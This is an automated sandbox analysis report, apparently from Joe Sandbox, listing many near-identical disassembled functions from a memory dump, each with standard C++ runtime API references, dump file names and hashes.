Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 00007FF6D9C21981
std::_Lockit::_Lockit.LIBCPMT ref: 00007FF6D9C219A6
std::_Lockit::~_Lockit.LIBCPMT ref: 00007FF6D9C219D0
std::_Facet_Register.LIBCPMT ref: 00007FF6D9C21A47
std::_Lockit::~_Lockit.LIBCPMT ref: 00007FF6D9C21A68
Concurrency::cancel_current_task.LIBCPMT ref: 00007FF6D9C21A7B

Memory Dump Source

Source File: 0000000C.00000002.1447928637.00007FF6D9BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6D9BF0000, based on PE: true

Associated: 0000000C.00000002.1447903010.00007FF6D9BF0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1447979243.00007FF6D9C52000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448006981.00007FF6D9C6C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448030058.00007FF6D9C71000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448030058.00007FF6D9C77000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ff6d9bf0000_MSIC534.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
String ID:
API String ID: 2081738530-0
Opcode ID: b4f9e0c4c4a88189330b8026f74b10148109776af48481e52f8805c03750c11c
Instruction ID: 481d013e4fb3e9eec73b12b3b6bb97de5530b83b1914c30510e211662324aafb
Opcode Fuzzy Hash: b4f9e0c4c4a88189330b8026f74b10148109776af48481e52f8805c03750c11c
Instruction Fuzzy Hash: A9317226A09A4681FB259F56E4401BD7371EF54BE0F181233EA5DC76A6DE3CE562C300

Function 00007FF6D9C05BD8 Relevance: 9.1, APIs: 6, Instructions: 81COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 00007FF6D9C05BED
std::_Lockit::_Lockit.LIBCPMT ref: 00007FF6D9C05C12
std::_Lockit::~_Lockit.LIBCPMT ref: 00007FF6D9C05C3C
std::_Facet_Register.LIBCPMT ref: 00007FF6D9C05CB3
std::_Lockit::~_Lockit.LIBCPMT ref: 00007FF6D9C05CD4
Concurrency::cancel_current_task.LIBCPMT ref: 00007FF6D9C05CE7

Memory Dump Source

Source File: 0000000C.00000002.1447928637.00007FF6D9BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6D9BF0000, based on PE: true

Associated: 0000000C.00000002.1447903010.00007FF6D9BF0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1447979243.00007FF6D9C52000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448006981.00007FF6D9C6C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448030058.00007FF6D9C71000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448030058.00007FF6D9C77000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ff6d9bf0000_MSIC534.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
String ID:
API String ID: 2081738530-0
Opcode ID: 006285de0621515d359ce12fc345f66d1627c98e70f5238c8fa960e55dcfbf37
Instruction ID: a855ed041d437e427e79a2db2ce82647563b85186e6daae85e06244211ed421d
Opcode Fuzzy Hash: 006285de0621515d359ce12fc345f66d1627c98e70f5238c8fa960e55dcfbf37
Instruction Fuzzy Hash: D8318362A09A8682EB159F57E84017D7371EB58BE4F080233DA4DC77E5EE7DE462C340

Function 00007FF6D9C10F0C Relevance: 9.1, APIs: 6, Instructions: 81COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 00007FF6D9C10F21
std::_Lockit::_Lockit.LIBCPMT ref: 00007FF6D9C10F46
std::_Lockit::~_Lockit.LIBCPMT ref: 00007FF6D9C10F70
std::_Facet_Register.LIBCPMT ref: 00007FF6D9C10FE7
std::_Lockit::~_Lockit.LIBCPMT ref: 00007FF6D9C11008
Concurrency::cancel_current_task.LIBCPMT ref: 00007FF6D9C1101B

Memory Dump Source

Source File: 0000000C.00000002.1447928637.00007FF6D9BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6D9BF0000, based on PE: true

Associated: 0000000C.00000002.1447903010.00007FF6D9BF0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1447979243.00007FF6D9C52000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448006981.00007FF6D9C6C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448030058.00007FF6D9C71000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448030058.00007FF6D9C77000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ff6d9bf0000_MSIC534.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
String ID:
API String ID: 2081738530-0
Opcode ID: c9a4e0e7b4ab53e893ed18d569bf3c5149d20095e87a3d9c04f0b0d324eb3b93
Instruction ID: a7e4d5127e3ee1aab59f89d77f2cefff3748b5482196a2607074691df52d5e78
Opcode Fuzzy Hash: c9a4e0e7b4ab53e893ed18d569bf3c5149d20095e87a3d9c04f0b0d324eb3b93
Instruction Fuzzy Hash: AA318F26A09A4685FB15DF16E8402BD6370EB85BE0F580133EA1DC76E5EE3CE466C304

Function 00007FF6D9BFEE70 Relevance: 9.1, APIs: 6, Instructions: 81COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 00007FF6D9BFEE85
std::_Lockit::_Lockit.LIBCPMT ref: 00007FF6D9BFEEAA
std::_Lockit::~_Lockit.LIBCPMT ref: 00007FF6D9BFEED5
std::_Facet_Register.LIBCPMT ref: 00007FF6D9BFEF4C
std::_Lockit::~_Lockit.LIBCPMT ref: 00007FF6D9BFEF76
Concurrency::cancel_current_task.LIBCPMT ref: 00007FF6D9BFEF89

Memory Dump Source

Source File: 0000000C.00000002.1447928637.00007FF6D9BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6D9BF0000, based on PE: true

Associated: 0000000C.00000002.1447903010.00007FF6D9BF0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1447979243.00007FF6D9C52000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448006981.00007FF6D9C6C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448030058.00007FF6D9C71000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448030058.00007FF6D9C77000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ff6d9bf0000_MSIC534.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
String ID:
API String ID: 2081738530-0
Opcode ID: 94c85e3a6885e86ff13da8fa6624b2fcaae79ce2fe23d2c55d0234a8f4776c47
Instruction ID: 82841ad84b0930534bd0aa4e20999f26cf7932c92ee608fd0ddb859648f391d6
Opcode Fuzzy Hash: 94c85e3a6885e86ff13da8fa6624b2fcaae79ce2fe23d2c55d0234a8f4776c47
Instruction Fuzzy Hash: 20317E26A0AA4681FB05DF16E8402BE6371FB95BE4F190133EA4DC76A5DE7DE462C300

Function 00007FF6D9C11024 Relevance: 9.1, APIs: 6, Instructions: 81COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 00007FF6D9C11039
std::_Lockit::_Lockit.LIBCPMT ref: 00007FF6D9C1105E
std::_Lockit::~_Lockit.LIBCPMT ref: 00007FF6D9C11088
std::_Facet_Register.LIBCPMT ref: 00007FF6D9C110FF
std::_Lockit::~_Lockit.LIBCPMT ref: 00007FF6D9C11120
Concurrency::cancel_current_task.LIBCPMT ref: 00007FF6D9C11133

Memory Dump Source

Source File: 0000000C.00000002.1447928637.00007FF6D9BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6D9BF0000, based on PE: true

Associated: 0000000C.00000002.1447903010.00007FF6D9BF0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1447979243.00007FF6D9C52000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448006981.00007FF6D9C6C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448030058.00007FF6D9C71000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448030058.00007FF6D9C77000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ff6d9bf0000_MSIC534.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
String ID:
API String ID: 2081738530-0
Opcode ID: 4ed889266c8f34ac9296bc9a39efd0163183bdd0f2669738bf207ae140b1644a
Instruction ID: fef673bb14c0c15faaeaf2eff917fdee622be9a16fb026c0d215876616422b9f
Opcode Fuzzy Hash: 4ed889266c8f34ac9296bc9a39efd0163183bdd0f2669738bf207ae140b1644a
Instruction Fuzzy Hash: 92318E26A1CA8681EB199F16E8402BDA371FB45BE0F580233DA4D973E5DE7DE462C344

Function 00007FF6D9BFEF90 Relevance: 9.1, APIs: 6, Instructions: 81COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 00007FF6D9BFEFA5
std::_Lockit::_Lockit.LIBCPMT ref: 00007FF6D9BFEFCA
std::_Lockit::~_Lockit.LIBCPMT ref: 00007FF6D9BFEFF5
std::_Facet_Register.LIBCPMT ref: 00007FF6D9BFF06C
std::_Lockit::~_Lockit.LIBCPMT ref: 00007FF6D9BFF096
Concurrency::cancel_current_task.LIBCPMT ref: 00007FF6D9BFF0A9

Memory Dump Source

Source File: 0000000C.00000002.1447928637.00007FF6D9BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6D9BF0000, based on PE: true

Associated: 0000000C.00000002.1447903010.00007FF6D9BF0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1447979243.00007FF6D9C52000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448006981.00007FF6D9C6C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448030058.00007FF6D9C71000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448030058.00007FF6D9C77000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ff6d9bf0000_MSIC534.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
String ID:
API String ID: 2081738530-0
Opcode ID: efc4ad35715c7b093dfe8a3a3559126c191ffa8df0383cec2e75ab23a145a574
Instruction ID: 5188e5f6d2b2abcfe51a4f1daf70fc38765d4efcbaa66e76394649745942ddcb
Opcode Fuzzy Hash: efc4ad35715c7b093dfe8a3a3559126c191ffa8df0383cec2e75ab23a145a574
Instruction Fuzzy Hash: 5F316D26B0AA4681EB15DF26E44027E6770FB85BE4F090233DA4DC76A5DE7DE462C300

Function 00007FF6D9C11254 Relevance: 9.1, APIs: 6, Instructions: 81COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 00007FF6D9C11269
std::_Lockit::_Lockit.LIBCPMT ref: 00007FF6D9C1128E
std::_Lockit::~_Lockit.LIBCPMT ref: 00007FF6D9C112B8
std::_Facet_Register.LIBCPMT ref: 00007FF6D9C1132F
std::_Lockit::~_Lockit.LIBCPMT ref: 00007FF6D9C11350
Concurrency::cancel_current_task.LIBCPMT ref: 00007FF6D9C11363

Memory Dump Source

Source File: 0000000C.00000002.1447928637.00007FF6D9BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6D9BF0000, based on PE: true

Associated: 0000000C.00000002.1447903010.00007FF6D9BF0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1447979243.00007FF6D9C52000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448006981.00007FF6D9C6C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448030058.00007FF6D9C71000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448030058.00007FF6D9C77000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ff6d9bf0000_MSIC534.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
String ID:
API String ID: 2081738530-0
Opcode ID: 14c1cfe4f42c82462013705d13bf994eeaad3f4468061a80f1e898b84cfdccaf
Instruction ID: 148e45f043f34283f4deeb0a78cb5882ad09369d27e9965bf8839417cdec380b
Opcode Fuzzy Hash: 14c1cfe4f42c82462013705d13bf994eeaad3f4468061a80f1e898b84cfdccaf
Instruction Fuzzy Hash: D8318166A0DA4281FB159F56E8402BD6370FB45BE4F480233DA0DC77AAEE3CE462C344

Function 00007FF6D9C1113C Relevance: 9.1, APIs: 6, Instructions: 81COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 00007FF6D9C11151
std::_Lockit::_Lockit.LIBCPMT ref: 00007FF6D9C11176
std::_Lockit::~_Lockit.LIBCPMT ref: 00007FF6D9C111A0
std::_Facet_Register.LIBCPMT ref: 00007FF6D9C11217
std::_Lockit::~_Lockit.LIBCPMT ref: 00007FF6D9C11238
Concurrency::cancel_current_task.LIBCPMT ref: 00007FF6D9C1124B

Memory Dump Source

Source File: 0000000C.00000002.1447928637.00007FF6D9BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6D9BF0000, based on PE: true

Associated: 0000000C.00000002.1447903010.00007FF6D9BF0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1447979243.00007FF6D9C52000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448006981.00007FF6D9C6C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448030058.00007FF6D9C71000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448030058.00007FF6D9C77000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ff6d9bf0000_MSIC534.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
String ID:
API String ID: 2081738530-0
Opcode ID: 283118c82c41f587953163e7f4014d1a595101a97f08c758c1cd7f0638e265a5
Instruction ID: b5fd7a9d7352639906aa8c2f664e0782d69142576df43ff2e0bf93521070ba47
Opcode Fuzzy Hash: 283118c82c41f587953163e7f4014d1a595101a97f08c758c1cd7f0638e265a5
Instruction Fuzzy Hash: CE31C426A09A8681FB199F56E8402BDB370EF55BE4F580133DA0DD77A6DE3CE462C304

Function 00007FF6D9C2150C Relevance: 9.1, APIs: 6, Instructions: 81COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 00007FF6D9C21521
std::_Lockit::_Lockit.LIBCPMT ref: 00007FF6D9C21546
std::_Lockit::~_Lockit.LIBCPMT ref: 00007FF6D9C21570
std::_Facet_Register.LIBCPMT ref: 00007FF6D9C215E7
std::_Lockit::~_Lockit.LIBCPMT ref: 00007FF6D9C21608
Concurrency::cancel_current_task.LIBCPMT ref: 00007FF6D9C2161B

Memory Dump Source

Source File: 0000000C.00000002.1447928637.00007FF6D9BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6D9BF0000, based on PE: true

Associated: 0000000C.00000002.1447903010.00007FF6D9BF0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1447979243.00007FF6D9C52000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448006981.00007FF6D9C6C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448030058.00007FF6D9C71000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448030058.00007FF6D9C77000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ff6d9bf0000_MSIC534.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
String ID:
API String ID: 2081738530-0
Opcode ID: ed674da2ea5aa6c971b9e2f219bb36e38f2821b5822bd66971173a8d5023320b
Instruction ID: 6ceb3071fdba4b046f66fd76896c6ceb041c272ff27ff3f7cc54bdb72cd96405
Opcode Fuzzy Hash: ed674da2ea5aa6c971b9e2f219bb36e38f2821b5822bd66971173a8d5023320b
Instruction Fuzzy Hash: 2A316D66A09A4685EB25DF16E8401BD7371FB84BE4F081633DE1D876A6EF7CE462C340

Function 00007FF6D9C11484 Relevance: 9.1, APIs: 6, Instructions: 81COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 00007FF6D9C11499
std::_Lockit::_Lockit.LIBCPMT ref: 00007FF6D9C114BE
std::_Lockit::~_Lockit.LIBCPMT ref: 00007FF6D9C114E8
std::_Facet_Register.LIBCPMT ref: 00007FF6D9C1155F
std::_Lockit::~_Lockit.LIBCPMT ref: 00007FF6D9C11580
Concurrency::cancel_current_task.LIBCPMT ref: 00007FF6D9C11593

Memory Dump Source

Source File: 0000000C.00000002.1447928637.00007FF6D9BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6D9BF0000, based on PE: true

Associated: 0000000C.00000002.1447903010.00007FF6D9BF0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1447979243.00007FF6D9C52000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448006981.00007FF6D9C6C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448030058.00007FF6D9C71000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448030058.00007FF6D9C77000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ff6d9bf0000_MSIC534.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
String ID:
API String ID: 2081738530-0
Opcode ID: f686ba4721d73371ec3509b4bb3bffbc5e13784dbcae9ca6a7685ba5834ff75c
Instruction ID: 3141b0eb1fb6da8cf6f20bfca145fb40aeb951e40d846a78031c0c468c046777
Opcode Fuzzy Hash: f686ba4721d73371ec3509b4bb3bffbc5e13784dbcae9ca6a7685ba5834ff75c
Instruction Fuzzy Hash: 1C318F22A19A4681FB159F16E8401BD7371EB46BE0F480233DA4E872A6DF3CE462C314

Function 00007FF6D9C213F4 Relevance: 9.1, APIs: 6, Instructions: 81COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 00007FF6D9C21409
std::_Lockit::_Lockit.LIBCPMT ref: 00007FF6D9C2142E
std::_Lockit::~_Lockit.LIBCPMT ref: 00007FF6D9C21458
std::_Facet_Register.LIBCPMT ref: 00007FF6D9C214CF
std::_Lockit::~_Lockit.LIBCPMT ref: 00007FF6D9C214F0
Concurrency::cancel_current_task.LIBCPMT ref: 00007FF6D9C21503

Memory Dump Source

Source File: 0000000C.00000002.1447928637.00007FF6D9BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6D9BF0000, based on PE: true

Associated: 0000000C.00000002.1447903010.00007FF6D9BF0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1447979243.00007FF6D9C52000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448006981.00007FF6D9C6C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448030058.00007FF6D9C71000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448030058.00007FF6D9C77000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ff6d9bf0000_MSIC534.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
String ID:
API String ID: 2081738530-0
Opcode ID: fe0147dd7e8c9a9008553fd8054b97a45f220e1ff8879fcbf5305c1c729d6e27
Instruction ID: 3ba782977bb9ac7e47829cd089407bdcdd7419a348c1425d5d758f3a164cc96c
Opcode Fuzzy Hash: fe0147dd7e8c9a9008553fd8054b97a45f220e1ff8879fcbf5305c1c729d6e27
Instruction Fuzzy Hash: 42318D26A08A4681FB25DF56E8801BD7371EB95BE0F185233DA1DC72A6DE3CE462C310

Function 00007FF6D9C1136C Relevance: 9.1, APIs: 6, Instructions: 81COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 00007FF6D9C11381
std::_Lockit::_Lockit.LIBCPMT ref: 00007FF6D9C113A6
std::_Lockit::~_Lockit.LIBCPMT ref: 00007FF6D9C113D0
std::_Facet_Register.LIBCPMT ref: 00007FF6D9C11447
std::_Lockit::~_Lockit.LIBCPMT ref: 00007FF6D9C11468
Concurrency::cancel_current_task.LIBCPMT ref: 00007FF6D9C1147B

Memory Dump Source

Source File: 0000000C.00000002.1447928637.00007FF6D9BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6D9BF0000, based on PE: true

Associated: 0000000C.00000002.1447903010.00007FF6D9BF0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1447979243.00007FF6D9C52000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448006981.00007FF6D9C6C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448030058.00007FF6D9C71000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448030058.00007FF6D9C77000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ff6d9bf0000_MSIC534.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
String ID:
API String ID: 2081738530-0
Opcode ID: f8d9c0bd2c71f697212810967ca2a7778e2269472297f3c0d1cf3f675de6a3fc
Instruction ID: b5cb7683fcceba085940c6c783c280f8de9a83d4e9c6c8ae7146e18077d46ff5
Opcode Fuzzy Hash: f8d9c0bd2c71f697212810967ca2a7778e2269472297f3c0d1cf3f675de6a3fc
Instruction Fuzzy Hash: 1D31CF26A0DA4281FB15DF16E8402BD7370EB86BE0F480233DA5DC76A5EE3CE462C354

Function 00007FF6D9C116B4 Relevance: 9.1, APIs: 6, Instructions: 81COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 00007FF6D9C116C9
std::_Lockit::_Lockit.LIBCPMT ref: 00007FF6D9C116EE
std::_Lockit::~_Lockit.LIBCPMT ref: 00007FF6D9C11718
std::_Facet_Register.LIBCPMT ref: 00007FF6D9C1178F
std::_Lockit::~_Lockit.LIBCPMT ref: 00007FF6D9C117B0
Concurrency::cancel_current_task.LIBCPMT ref: 00007FF6D9C117C3

Memory Dump Source

Source File: 0000000C.00000002.1447928637.00007FF6D9BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6D9BF0000, based on PE: true

Associated: 0000000C.00000002.1447903010.00007FF6D9BF0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1447979243.00007FF6D9C52000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448006981.00007FF6D9C6C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448030058.00007FF6D9C71000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448030058.00007FF6D9C77000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ff6d9bf0000_MSIC534.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
String ID:
API String ID: 2081738530-0
Opcode ID: 97d15f4b7e4db43da4c1468bb3b0722c14224d7c4c5551d2748ff46b8915a50d
Instruction ID: fb758bcd5ed13af71cce607f40732ca0525be4137215a254edde3ce366a6c2d4
Opcode Fuzzy Hash: 97d15f4b7e4db43da4c1468bb3b0722c14224d7c4c5551d2748ff46b8915a50d
Instruction Fuzzy Hash: 8A319026A0CA4282FB159F16E8502BD6370EF55BE0F180533DA0DC77A6EE3CE462C344

Function 00007FF6D9C21624 Relevance: 9.1, APIs: 6, Instructions: 81COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 00007FF6D9C21639
std::_Lockit::_Lockit.LIBCPMT ref: 00007FF6D9C2165E
std::_Lockit::~_Lockit.LIBCPMT ref: 00007FF6D9C21688
std::_Facet_Register.LIBCPMT ref: 00007FF6D9C216FF
std::_Lockit::~_Lockit.LIBCPMT ref: 00007FF6D9C21720
Concurrency::cancel_current_task.LIBCPMT ref: 00007FF6D9C21733

Memory Dump Source

Source File: 0000000C.00000002.1447928637.00007FF6D9BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6D9BF0000, based on PE: true

Associated: 0000000C.00000002.1447903010.00007FF6D9BF0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1447979243.00007FF6D9C52000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448006981.00007FF6D9C6C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448030058.00007FF6D9C71000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448030058.00007FF6D9C77000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ff6d9bf0000_MSIC534.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
String ID:
API String ID: 2081738530-0
Opcode ID: 50a7e5dd756862258847633d0cc2bbb44e7e06336ef844e967a4d1909efec431
Instruction ID: 88c258e15489f889f341feec848973a34c9d05056395ff034da8f30f6bb87b54
Opcode Fuzzy Hash: 50a7e5dd756862258847633d0cc2bbb44e7e06336ef844e967a4d1909efec431
Instruction Fuzzy Hash: 61319026A18A4681FB259F16E8401BD7371EB94BE4F181233DE0DC77A6DE7CE462C340

Function 00007FF6D9BFF8A0 Relevance: 9.1, APIs: 6, Instructions: 81COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 00007FF6D9BFF8B5
std::_Lockit::_Lockit.LIBCPMT ref: 00007FF6D9BFF8DA
std::_Lockit::~_Lockit.LIBCPMT ref: 00007FF6D9BFF905
std::_Facet_Register.LIBCPMT ref: 00007FF6D9BFF97C
std::_Lockit::~_Lockit.LIBCPMT ref: 00007FF6D9BFF9A6
Concurrency::cancel_current_task.LIBCPMT ref: 00007FF6D9BFF9B9

Memory Dump Source

Source File: 0000000C.00000002.1447928637.00007FF6D9BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6D9BF0000, based on PE: true

Associated: 0000000C.00000002.1447903010.00007FF6D9BF0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1447979243.00007FF6D9C52000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448006981.00007FF6D9C6C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448030058.00007FF6D9C71000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448030058.00007FF6D9C77000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ff6d9bf0000_MSIC534.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
String ID:
API String ID: 2081738530-0
Opcode ID: fecaed234125225d04094b4d7a9aac20fb969254fe94d3bd86d407112c33d5c4
Instruction ID: 67f6ce668af51b323ae88270da2adbf4ba28d978d688dea8659f8890a1b4c768
Opcode Fuzzy Hash: fecaed234125225d04094b4d7a9aac20fb969254fe94d3bd86d407112c33d5c4
Instruction Fuzzy Hash: CE31BE26B1AA4691EB05DF16E8542BE6770EB85BE4F094233DA5CC33A5DE7DE462C300

Function 00007FF6D9C21854 Relevance: 9.1, APIs: 6, Instructions: 81COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 00007FF6D9C21869
std::_Lockit::_Lockit.LIBCPMT ref: 00007FF6D9C2188E
std::_Lockit::~_Lockit.LIBCPMT ref: 00007FF6D9C218B8
std::_Facet_Register.LIBCPMT ref: 00007FF6D9C2192F
std::_Lockit::~_Lockit.LIBCPMT ref: 00007FF6D9C21950
